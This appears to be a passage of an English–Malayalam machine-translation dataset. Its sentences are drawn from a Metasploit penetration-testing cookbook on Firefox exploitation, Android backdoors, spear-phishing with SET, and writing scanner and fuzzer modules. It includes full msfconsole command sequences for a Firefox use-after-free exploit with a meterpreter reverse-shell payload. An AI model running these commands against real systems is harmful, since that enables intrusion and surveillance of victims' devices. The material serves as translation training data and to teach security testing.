Windows.","translation":"ക്ലയിന്റ്-സൈഡ് ചൂഷണവും, ആന്റിവൈറസ് ഒഴിവാക്കലും, ചാപ്റ്റർ 7 [ 262 ] വിൻഡോസ് 10 മെഷീൻ ചൂഷണം ചെയ്യുന്നു. ഈ പാചകക്കുറിപ്പിൽ, Microsoft Windows-ലെ Mozilla Firefox-ൻ്റെ നിരവധി പതിപ്പുകളിൽ nsSMILTimeContainer::NotifyTimeChange() എന്നതിലെ ഉപയോഗത്തിന് ശേഷമുള്ള ഒരു സുരക്ഷാ പ്രശ്നം ഞങ്ങൾ ചൂഷണം ചെയ്യും.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Getting ready So, before we begin we need to download Mozilla Firefox 41.0 from https:/​/​ftp.​mozilla. org/​pub/​firefox/​releases/​41.​0/​win32/​en-​US/​Firefox%20Setup%2041.​0.​exe and install it on our Windows 10 target machine.","translation":"തയ്യാറെടുക്കുന്നു. അതിനാൽ, ആരംഭിക്കുന്നതിന് മുമ്പ്, https:/​/​ftp.​mozilla.org/​pub/​firefox/​releases/​41.​0/​win32/​en-​US/​Firefox%20Setup%2041.​0.​exe എന്നതിൽ നിന്ന് Mozilla Firefox 41.0 ഡൗൺലോഡ് ചെയ്ത് ഞങ്ങളുടെ Windows 10 ടാർഗെറ്റ് മെഷീനിൽ ഇൻസ്റ്റാൾ ചെയ്യേണ്ടതുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"How to do it... As always, good reconnaissance makes all the difference, so we first need to gather information about the browser the victim is using.","translation":"എങ്ങനെ ചെയ്യാം... എപ്പോഴും, നല്ല രഹസ്യാന്വേഷണം എല്ലാ വ്യത്യാസവും ഉണ്ടാക്കുന്നു, അതിനാൽ ഇര ഉപയോഗിക്കുന്ന ബ്രൗസറിനെക്കുറിച്ച് ആദ്യം വിവരങ്ങൾ ശേഖരിക്കേണ്ടതുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"To help us with this task, we can use the HTTP Client Information Gather1. auxiliary module by specifying the IP address and port of the host to listen on and the URI to use, then use one of your favorite pretexts to make the victim open the link:","translation":"ഈ ടാസ്‌ക്കിൽ സഹായിക്കുന്നതിന്, കേൾക്കാൻ ഹോസ്റ്റിൻ്റെ IP വിലാസവും പോർട്ടും, ഉപയോഗിക്കേണ്ട URI എന്നിവ വ്യക്തമാക്കുന്നതിലൂടെ HTTP ക്ലയിന്റ് ഇൻഫർമേഷൻ ഗാതർ1. സഹായ മൊഡ്യൂൾ ഉപയോഗിക്കാം, തുടർന്ന് ഇരയെ ലിങ്ക് തുറക്കാൻ നിങ്ങളുടെ പ്രിയപ്പെട്ട പ്രീടെക്സ്റ്റുകളിൽ ഒന്ന് ഉപയോഗിക്കുക:","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"msf > use auxiliary/gather/browser_info","translation":"msf > use auxiliary/gather/browser_info","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"msf auxiliary(gather/browser_info) > set SRVHOST 192.168.216.5","translation":"msf auxiliary(gather/browser_info) > set SRVHOST 192.168.216.5","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"msf auxiliary(gather/browser_info) > set SRVPORT 80","translation":"msf auxiliary(gather/browser_info) > set SRVPORT 80","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"msf auxiliary(gather/browser_info) > set URIPATH /","translation":"msf auxiliary(gather/browser_info) > set URIPATH /","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"msf auxiliary(gather/browser_info) > run","translation":"msf auxiliary(gather/browser_info) > run","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Looking at the output, we can see that the victim is running Firefox version 41.0.2.","translation":"ഔട്ട്‌പുട്ട് നോക്കുമ്പോൾ, ഇര Firefox പതിപ്പ് 41.0.2 പ്രവർത്തിപ്പിക്കുന്നു എന്ന് കാണാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"With this information, we can see that there is an exploit we can use on Firefox nsSMILTimeContainer::NotifyTimeChange() with the RCE exploit module.","translation":"ഈ വിവരങ്ങൾ ഉപയോഗിച്ച്, RCE എക്സ്പ്ലോയിറ്റ് മൊഡ്യൂൾ ഉപയോഗിച്ച് Firefox nsSMILTimeContainer::NotifyTimeChange() എന്നതിൽ ഉപയോഗിക്കാൻ കഴിയുന്ന ഒരു എക്സ്പ്ലോയിറ്റ് ഉണ്ടെന്ന് നമുക്ക് കാണാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"To exploit the target using this module, we first need to set the IP address and3. port of the host we will be serving the exploit on and the URI to use, then set the payload we want to execute on the target, and since we are using a reverse shell, we also need to specify the listening host IP address:","translation":"ഈ മൊഡ്യൂൾ ഉപയോഗിച്ച് ടാർഗെറ്റിനെ ചൂഷണം ചെയ്യാൻ, എക്സ്പ്ലോയിറ്റ് നൽകുന്ന ഹോസ്റ്റിൻ്റെ IP വിലാസവും പോർട്ടും, ഉപയോഗിക്കേണ്ട URI എന്നിവ ആദ്യം സജ്ജീകരിക്കണം, തുടർന്ന് ടാർഗെറ്റിൽ എക്സിക്യൂട്ട് ചെയ്യാൻ ആഗ്രഹിക്കുന്ന പേലോഡ് സജ്ജീകരിക്കുക, കൂടാതെ ഞങ്ങൾ ഒരു റിവേഴ്സ് ഷെൽ ഉപയോഗിക്കുന്നതിനാൽ, കേൾക്കുന്ന ഹോസ്റ്റ് IP വിലാസവും വ്യക്തമാക്കണം:","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"msf auxiliary(gather/browser_info) > use exploit/windows/browser/firefox_smil_uaf","translation":"msf auxiliary(gather/browser_info) > use exploit/windows/browser/firefox_smil_uaf","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"msf exploit(windows/browser/firefox_smil_uaf) > set SRVHOST 192.168.216.5","translation":"msf exploit(windows/browser/firefox_smil_uaf) > set SRVHOST 192.168.216.5","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"msf exploit(windows/browser/firefox_smil_uaf) > set SRVPORT 80","translation":"msf exploit(windows/browser/firefox_smil_uaf) > set SRVPORT 80","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"msf exploit(windows/browser/firefox_smil_uaf) > set URIPATH /","translation":"msf exploit(windows/browser/firefox_smil_uaf) > set URIPATH /","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"msf exploit(windows/browser/firefox_smil_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp","translation":"msf exploit(windows/browser/firefox_smil_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"msf exploit(windows/browser/firefox_smil_uaf) > set LHOST 192.168.216.5","translation":"msf exploit(windows/browser/firefox_smil_uaf) > set LHOST 192.168.216.5","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"msf exploit(windows/browser/firefox_smil_uaf) > exploit","translation":"msf exploit(windows/browser/firefox_smil_uaf) > exploit","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"After allowing unknown sources, you can install the backdoor and get a session on the target device.","translation":"അജ്ഞാത ഉറവിടങ്ങൾ അനുവദിച്ച ശേഷം, നിങ്ങൾക്ക് ബാക്ക്ഡോർ ഇൻസ്റ്റാൾ ചെയ്യാനും ടാർഗെറ്റ് ഉപകരണത്തിൽ ഒരു സെഷൻ നേടാനും കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Besides all the regular meterpreter commands, using the Android payload we get a couple of specific commands.","translation":"എല്ലാ സാധാരണ മീറ്റർപ്രറ്റർ കമാൻഡുകൾക്ക് പുറമെ, Android പേലോഡ് ഉപയോഗിച്ച് നമുക്ക് കുറച്ച് പ്രത്യേക കമാൻഡുകൾ ലഭിക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Looking at the output of the help command, we can see that we can now get the call logs, read and send SMS messages, and get the location of the device.","translation":"സഹായ കമാൻഡിന്റെ ഔട്ട്‌പുട്ട് നോക്കുമ്പോൾ, ഇപ്പോൾ കോൾ ലോഗുകൾ നേടാനും, SMS സന്ദേശങ്ങൾ വായിക്കാനും അയക്കാനും, ഉപകരണത്തിന്റെ ലൊക്കേഷൻ നേടാനും കഴിയുമെന്ന് നമുക്ക് കാണാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"There's more... Metasploit is not restricted to Android devices, if you have a jailbroken arm64 iOS device, you can also create a backdoor.","translation":"ഇനിയും ഉണ്ട്... മെറ്റാസ്‌പ്ലോയിറ്റ് Android ഉപകരണങ്ങളിൽ മാത്രം പരിമിതപ്പെടുത്തിയിട്ടില്ല, നിങ്ങൾക്ക് ഒരു ജയിൽബ്രോക്കൺ arm64 iOS ഉപകരണം ഉണ്ടെങ്കിൽ, നിങ്ങൾക്ക് ഒരു ബാക്ക്ഡോർ ഉണ്ടാക്കാനും കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The Social-Engineer Toolkit (SET) is an open source penetration testing framework specifically designed to perform advanced attacks against the human element.","translation":"സോഷ്യൽ-എഞ്ചിനീയർ ടൂൾകിറ്റ് (SET) എന്നത് ഒരു ഓപ്പൺ സോഴ്സ് പെനെട്രേഷൻ ടെസ്റ്റിംഗ് ഫ്രെയിംവർക്കാണ്, ഇത് മനുഷ്യ ഘടകത്തിനെതിരെ വിപുലമായ ആക്രമണങ്ങൾ നടത്താൻ പ്രത്യേകം രൂപകൽപ്പന ചെയ്തതാണ്.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"SET can be installed on Linux and macOS; it comes pre-installed on Kali Linux, which also maintains SET updates.","translation":"SET ലിനക്സിലും macOS-ലും ഇൻസ്റ്റാൾ ചെയ്യാവുന്നതാണ്; ഇത് കാലി ലിനക്സിൽ മുൻകൂട്ടി ഇൻസ്റ്റാൾ ചെയ്തിട്ടുണ്ട്, ഇത് SET അപ്‌ഡേറ്റുകളും നിലനിർത്തുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"To launch SET on Kali Linux, start the Terminal window and run the setoolkit command.","translation":"Kali Linux-ൽ SET പ്രവർത്തിപ്പിക്കാൻ, ടെർമിനൽ വിൻഡോ ആരംഭിച്ച് setoolkit കമാൻഡ് പ്രവർത്തിപ്പിക്കുക.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"SET is a Python-based automation tool that creates a menu-driven application for us.","translation":"SET എന്നത് ഒരു മെനു-ഡ്രിവൺ ആപ്ലിക്കേഷൻ ഉണ്ടാക്കുന്ന ഒരു പൈത്തൺ അടിസ്ഥാനമാക്കിയുള്ള ഓട്ടോമേഷൻ ഉപകരണമാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"A spear-phishing attack vector is an email attack scenario that is used to send malicious emails to target/specific user(s).","translation":"ഒരു സ്പിയർ-ഫിഷിംഗ് ആക്രമണ വെക്റ്റർ എന്നത് ടാർഗെറ്റ്/നിർദ്ദിഷ്ട ഉപയോക്താക്കൾക്ക് ദോഷകരമായ ഇമെയിലുകൾ അയയ്ക്കാൻ ഉപയോഗിക്കുന്ന ഒരു ഇമെയിൽ ആക്രമണ സാഹചര്യമാണ്.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"In order to spoof your own email address, you will require a sendmail server.","translation":"നിങ്ങളുടെ സ്വന്തം ഇമെയിൽ വിലാസം സ്പൂഫ് ചെയ്യുന്നതിന്, നിങ്ങൾക്ക് ഒരു സെൻഡ്മെയിൽ സെർവർ ആവശ്യമാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The spear-phishing module has three different attack vectors at our disposal.","translation":"സ്പിയർ-ഫിഷിംഗ് മൊഡ്യൂളിന് നമ്മുടെ കൈവശം മൂന്ന് വ്യത്യസ്ത ആക്രമണ വെക്റ്ററുകൾ ഉണ്ട്.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Passing the first option will start the mass email attack.","translation":"ആദ്യ ഓപ്ഷൻ പാസ്സാക്കുന്നത് വലിയ തോതിലുള്ള ഇമെയിൽ ആക്രമണം ആരംഭിക്കും.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Then, we will be prompted to select a payload and specify the IP address or URL and the port for the listener.","translation":"തുടർന്ന്, ഒരു പേലോഡ് തിരഞ്ഞെടുക്കാനും ലിസണറിനായുള്ള IP വിലാസമോ URL-ഉം പോർട്ടും വ്യക്തമാക്കാനും ആവശ്യപ്പെടും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Setting up your own server may not be very reliable, as most mail services use a reverse lookup.","translation":"നിങ്ങളുടെ സ്വന്തം സെർവർ സജ്ജീകരിക്കുന്നത് വളരെ വിശ്വസനീയമല്ലാത്ത ഒന്നായിരിക്കാം, കാരണം മിക്ക മെയിൽ സേവനങ്ങളും ഒരു റിവേഴ്സ് ലുക്ക്അപ്പ് ഉപയോഗിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The SET web attack vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.","translation":"SET വെബ് ആക്രമണ വെക്റ്റർ എന്നത് ഉദ്ദേശിച്ച ഇരയെ kompromis ചെയ്യാനായി ഒന്നിലധികം വെബ്-അധിഷ്ഠിത ആക്രമണങ്ങൾ ഉപയോഗിക്കുന്ന ഒരു അതുല്യമായ മാർഗ്ഗമാണ്.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"After selecting the HTA Attack Method in SET, we can clone a site through which we will deliver our payload.","translation":"SET-ൽ HTA ആക്രമണ രീതി തിരഞ്ഞെടുത്ത ശേഷം, ഞങ്ങളുടെ പേലോഡ് വിതരണം ചെയ്യുന്ന ഒരു സൈറ്റ് ക്ലോൺ ചെയ്യാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The multi-attack web method takes web attacks to the next level by combining several attacks into one.","translation":"ഒന്നിലധികം ആക്രമണങ്ങൾ ഒന്നായി സംയോജിപ്പിച്ച് വെബ് ആക്രമണങ്ങളെ അടുത്ത ഘട്ടത്തിലേക്ക് കൊണ്ടുപോകുന്ന രീതിയാണ് മൾട്ടി-അറ്റാക്ക് വെബ് രീതി.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Once the file or URL is opened by the target user, then each attack is thrown one by one, unless a successful attack is reported.","translation":"ടാർഗെറ്റ് ഉപയോക്താവ് ഫയലോ URL-ഓ തുറന്നാൽ, വിജയകരമായ ഒരു ആക്രമണം റിപ്പോർട്ട് ചെയ്യാത്ത പക്ഷം ഓരോ ആക്രമണവും ഒന്നൊന്നായി നടത്തപ്പെടും.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"The infectious media generator is a relatively simple attack vector.","translation":"ഇൻഫെക്ഷ്യസ് മീഡിയ ജനറേറ്റർ താരതമ്യേന ലളിതമായ ഒരു ആക്രമണ രീതിയാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"This attack vector is based on the simple principle of generating a malicious executable and then encoding it with available encoders.","translation":"ഈ ആക്രമണ രീതി ഒരു ദോഷകരമായ എക്സിക്യൂട്ടബിൾ ഉണ്ടാക്കുകയും തുടർന്ന് ലഭ്യമായ എൻകോഡറുകൾ ഉപയോഗിച്ച് എൻകോഡ് ചെയ്യുകയും ചെയ്യുന്ന ലളിതമായ തത്വത്തെ അടിസ്ഥാനമാക്കിയുള്ളതാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"This module will enumerate user accounts in the default domain using PowerShell.","translation":"ഈ മൊഡ്യൂൾ, PowerShell ഉപയോഗിച്ച്, ഡിഫോൾട്ട് ഡൊമെയ്‌നിലെ ഉപയോക്തൃ അക്കൗണ്ടുകൾ എണ്ണും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"To test it, I have added the Active Directory Domain Services Role to the Metasploitable 3 machine.","translation":"പരിശോധിക്കുന്നതിന്, ഞാൻ Metasploitable 3 മെഷീനിൽ Active Directory Domain Services Role ചേർത്തിട്ടുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Since we do not need to be a privileged user to use this module, it can be very useful during post exploitation.","translation":"ഈ മൊഡ്യൂൾ ഉപയോഗിക്കുന്നതിന് നമ്മൾ ഒരു പ്രത്യേക അവകാശമുള്ള ഉപയോക്താവാകേണ്ടതില്ലാത്തതിനാൽ, ഇത് ചൂഷണത്തിനു ശേഷമുള്ള പ്രവർത്തനങ്ങളിൽ വളരെ ഉപയോഗപ്രദമാകും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"For that reason, in this recipe, we will learn how to build our own auxiliary module.","translation":"അതുകൊണ്ട്, ഈ പാചകക്കുറിപ്പിൽ, നമ്മുടെ സ്വന്തം സഹായ മൊഡ്യൂൾ എങ്ങനെ നിർമ്മിക്കാമെന്ന് പഠിക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"CWMP is a protocol used by providers for remote management of customer-premises equipment.","translation":"ഉപഭോക്തൃ പരിസര ഉപകരണങ്ങളുടെ വിദൂര മാനേജ്മെൻ്റിനായി ദാതാക്കൾ ഉപയോഗിക്കുന്ന ഒരു പ്രോട്ടോക്കോൾ ആണ് CWMP.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"When we connect to the router using the CWMP default port 7547, we get the following answer:","translation":"CWMP ഡിഫോൾട്ട് പോർട്ട് 7547 ഉപയോഗിച്ച് റൂട്ടറിലേക്ക് കണക്ട് ചെയ്യുമ്പോൾ, നമുക്ക് താഴെ പറയുന്ന പ്രതികരണം ലഭിക്കും:","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"By using curl with the -v option for verbose, we can see the request made and the reply from the router:","translation":"വിശദാംശങ്ങൾക്കായി -v എന്ന ഓപ്ഷനോടുകൂടി curl ഉപയോഗിക്കുന്നതിലൂടെ, ഉണ്ടാക്കിയ അഭ്യർത്ഥനയും റൂട്ടറിൽ നിന്നുള്ള മറുപടിയും കാണാൻ കഴിയും:","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"With this information, we can build an auxiliary module to scan a target range and identify targets running Huawei home routers with CWMP enabled.","translation":"ഈ വിവരങ്ങൾ ഉപയോഗിച്ച്, ടാർഗെറ്റ് ശ്രേണി സ്കാൻ ചെയ്യാനും CWMP പ്രവർത്തനക്ഷമമാക്കിയ Huawei ഹോം റൂട്ടറുകൾ പ്രവർത്തിപ്പിക്കുന്ന ടാർഗെറ്റുകളെ തിരിച്ചറിയാനും ഒരു സഹായ മൊഡ്യൂൾ നിർമ്മിക്കാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Since Metasploit probably already has a module with the base features we are looking for, the first thing we should do is search the available modules and see what we can use.","translation":"നമ്മൾ തിരയുന്ന അടിസ്ഥാന സവിശേഷതകളുള്ള ഒരു മൊഡ്യൂൾ ഇതിനകം തന്നെ Metasploit-ൽ ഉണ്ടാകാൻ സാധ്യതയുള്ളതിനാൽ, നമ്മൾ ചെയ്യേണ്ട ആദ്യത്തെ കാര്യം ലഭ്യമായ മൊഡ്യൂളുകൾ തിരയുകയും എന്തൊക്കെ ഉപയോഗിക്കാമെന്ന് നോക്കുകയും ചെയ്യുക എന്നതാണ്.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Again, we will just focus on the run method.","translation":"വീണ്ടും, നമ്മൾ റൺ രീതിയിൽ മാത്രം ശ്രദ്ധ കേന്ദ്രീകരിക്കും.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"For our module, we will start by changing the initialize method.","translation":"നമ്മുടെ മൊഡ്യൂളിനായി, initialize രീതി മാറ്റുന്നതിലൂടെ ആരംഭിക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Using the register_options data structure, we can specify the default port number for the module, and since we want to scan for the CWMP service we will specify port 7547:","translation":"register_options ഡാറ്റാ ഘടന ഉപയോഗിച്ച്, മൊഡ്യൂളിനായുള്ള ഡിഫോൾട്ട് പോർട്ട് നമ്പർ വ്യക്തമാക്കാൻ കഴിയും, കൂടാതെ CWMP സേവനത്തിനായി സ്കാൻ ചെയ്യാൻ ആഗ്രഹിക്കുന്നതിനാൽ പോർട്ട് 7547 വ്യക്തമാക്കും:","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Then, we need to compare the response and verify that the equipment is a Huawei Home Gateway.","translation":"തുടർന്ന്, പ്രതികരണം താരതമ്യം ചെയ്യുകയും, ഉപകരണം ഒരു Huawei Home Gateway ആണെന്ന് ഉറപ്പാക്കുകയും വേണം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"For that, we will create a new variable called huawei holding the response from our router:","translation":"അതിനായി, നമ്മുടെ റൂട്ടറിൽ നിന്നുള്ള പ്രതികരണം ഉൾക്കൊള്ളുന്ന huawei എന്ന പുതിയ വേരിയബിൾ സൃഷ്ടിക്കും:","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Next, we will use an if statement to compare the response from the target with the response from our router and, if they match, print and save the result:","translation":"അടുത്തതായി, ടാർഗെറ്റിൽ നിന്നുള്ള പ്രതികരണവും നമ്മുടെ റൂട്ടറിൽ നിന്നുള്ള പ്രതികരണവും തമ്മിൽ താരതമ്യം ചെയ്യാൻ ഒരു if സ്റ്റേറ്റ്‌മെൻ്റ് ഉപയോഗിക്കും, അവ പൊരുത്തപ്പെടുന്നെങ്കിൽ, ഫലം പ്രിൻ്റ് ചെയ്യുകയും സംരക്ഷിക്കുകയും ചെയ്യും:","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Save the code into a file named huawei_cwmp.rb in /usr/share/metasploit-framework/modules/auxiliary/scanner/http, load the module using msfconsole, set the IP address or range you want to scan, and run the module:","translation":"കോഡ് /usr/share/metasploit-framework/modules/auxiliary/scanner/http എന്നതിലെ huawei_cwmp.rb എന്ന ഫയലിൽ സംരക്ഷിക്കുക, msfconsole ഉപയോഗിച്ച് മൊഡ്യൂൾ ലോഡ് ചെയ്യുക, സ്കാൻ ചെയ്യാൻ ആഗ്രഹിക്കുന്ന IP വിലാസമോ ശ്രേണിയോ സജ്ജീകരിക്കുക, തുടർന്ന് മൊഡ്യൂൾ പ്രവർത്തിപ്പിക്കുക:","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Since we are saving the output to the current workspace, we can use the host and services command to display the result of the scan:","translation":"ഔട്ട്‌പുട്ട് നിലവിലെ വർക്ക്‌സ്‌പേസിലേക്ക് സംരക്ഷിക്കുന്നതിനാൽ, സ്കാനിൻ്റെ ഫലം പ്രദർശിപ്പിക്കുന്നതിന് ഹോസ്റ്റും സേവനങ്ങളും കമാൻഡ് ഉപയോഗിക്കാം:","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"In this chapter, we will cover the following recipes:","translation":"ഈ അധ്യായത്തിൽ, താഴെ പറയുന്ന വിഷയങ്ങൾ ഉൾക്കൊള്ളുന്നു:","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Mixins are comprehensive mechanisms in the Ruby language that provide functionality for a module.","translation":"ഒരു മൊഡ്യൂളിനായി പ്രവർത്തനം നൽകുന്ന റൂബി ഭാഷയിലെ സമഗ്രമായ സംവിധാനങ്ങളാണ് മിക്സിനുകൾ.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"This mixin provides methods for interacting with an SMB/CIFS service on a remote machine.","translation":"ഈ മിക്സിൻ വിദൂര മെഷീനിലെ SMB/CIFS സേവനവുമായി സംവദിക്കാനുള്ള വഴികൾ നൽകുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"UDP Service Sweeper","translation":"UDP സേവന സ്വീപ്പർ","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"User Account Control (UAC) bypassing","translation":"ഉപയോക്തൃ അക്കൗണ്ട് നിയന്ത്രണം (UAC) മറികടക്കുന്നു","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"User interface (UI)","translation":"ഉപയോക്തൃ ഇന്റർഫേസ് (UI)","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Version detection","translation":"പതിപ്പ് കണ്ടെത്തൽ","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Virtual Network Computing (VNC) injecting remotely","translation":"വിർച്വൽ നെറ്റ്‌വർക്ക് കമ്പ്യൂട്ടിംഗ് (VNC) വിദൂരമായി കുത്തിവയ്ക്കുന്നു","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Virtual networks reference","translation":"വിർച്വൽ നെറ്റ്‌വർക്കുകൾ റഫറൻസ്","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Vulnerability","translation":"ദൗർബല്യം","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Vulnerable machines URL","translation":"ദൗർബല്യമുള്ള മെഷീനുകളുടെ URL","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Website attack vectors","translation":"വെബ്സൈറ്റ് ആക്രമണ രീതികൾ","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Using Windows 10 machine exploiting","translation":"വിൻഡോസ് 10 മെഷീൻ ഉപയോഗിച്ച് ചൂഷണം ചെയ്യുന്നു","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Windows binaries backdooring","translation":"വിൻഡോസ് ബൈനറികൾ ബാക്ക്ഡോർ ചെയ്യുന്നു","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Windows Local Enumeration (WinEnum) used, for system scraping","translation":"സിസ്റ്റം സ്ക്രാപ്പിംഗിനായി വിൻഡോസ് ലോക്കൽ എൻയുമറേഷൻ (WinEnum) ഉപയോഗിക്കുന്നു","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Windows Management Instrumentation (WMI)","translation":"വിൻഡോസ് മാനേജ്മെൻ്റ് ഇൻസ്ട്രുമെന്റേഷൻ (WMI)","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Windows Remote Management (WinRM) scanning","translation":"വിൻഡോസ് റിമോട്ട് മാനേജ്മെൻ്റ് (WinRM) സ്കാനിംഗ്","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Windows Server machine exploiting","translation":"വിൻഡോസ് സെർവർ മെഷീൻ ചൂഷണം ചെയ്യുന്നു","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Installing Windows Metasploit","translation":"വിൻഡോസ് മെറ്റാസ്പ്ലോയിറ്റ് ഇൻസ്റ്റാൾ ചെയ്യുന്നു","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Wireless MITM attacks","translation":"വയർലെസ് MITM ആക്രമണങ്ങൾ","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Setting up wireless MITM attacks","translation":"വയർലെസ് MITM ആക്രമണങ്ങൾ സജ്ജീകരിക്കുന്നു","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Performing wireless penetration test with Metasploit","translation":"മെറ്റാസ്പ്ലോയിറ്റ് ഉപയോഗിച്ച് വയർലെസ് നുഴഞ്ഞുകയറ്റ പരിശോധന നടത്തുന്നു","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Creating workspaces","translation":"പ്രവർത്തനസ്ഥലങ്ങൾ ഉണ്ടാക്കുന്നു","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Metasploit has an HTTP GET Request URI Fuzzer that we can use.","translation":"മെറ്റാസ്‌പ്ലോയിറ്റിന് ഒരു HTTP GET അഭ്യർത്ഥന URI ഫസ്സർ ഉണ്ട്, അത് നമുക്ക് ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Looking at the output of the module, we can see that we were able to crash the service.","translation":"module-ൻ്റെ ഔട്ട്‌പുട്ട് നോക്കുമ്പോൾ, സേവനം തകർക്കാൻ കഴിഞ്ഞു എന്ന് നമുക്ക് കാണാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"In the last recipe, we used an HTTP fuzzer that sent a series of HTTP GET requests.","translation":"കഴിഞ്ഞ പാചകക്കുറിപ്പിൽ, HTTP GET അഭ്യർത്ഥനകളുടെ ഒരു പരമ്പര അയച്ച ഒരു HTTP ഫസ്സർ നമ്മൾ ഉപയോഗിച്ചു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Now, we will learn how it worked and build our own small HTTP fuzzer.","translation":"ഇനി, ഇത് എങ്ങനെ പ്രവർത്തിച്ചു എന്ന് പഠിക്കുകയും നമ്മുടെ സ്വന്തം ചെറിയ HTTP ഫസ്സർ നിർമ്മിക്കുകയും ചെയ്യും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The basic template to build a fuzzer will be similar to the one we discussed.","translation":"ഒരു ഫസ്സർ നിർമ്മിക്കുന്നതിനുള്ള അടിസ്ഥാന ടെംപ്ലേറ്റ് നമ്മൾ ചർച്ച ചെയ്തതിന് സമാനമായിരിക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Now that we have imported the MSF libraries, created a class, and defined the options.","translation":"MSF ലൈബ്രറികൾ ഇറക്കുമതി ചെയ്യുകയും, ഒരു ക്ലാസ് ഉണ്ടാക്കുകയും, ഓപ്ഷനുകൾ നിർവചിക്കുകയും ചെയ്തു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The @connected instance variable is used to make the connected variable available.","translation":"@connected എന്ന ഇൻസ്റ്റൻസ് വേരിയബിൾ കണക്ട് ചെയ്ത വേരിയബിൾ ലഭ്യമാക്കാൻ ഉപയോഗിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"sock.put is used to send the request using the TCP mixin.","translation":"TCP 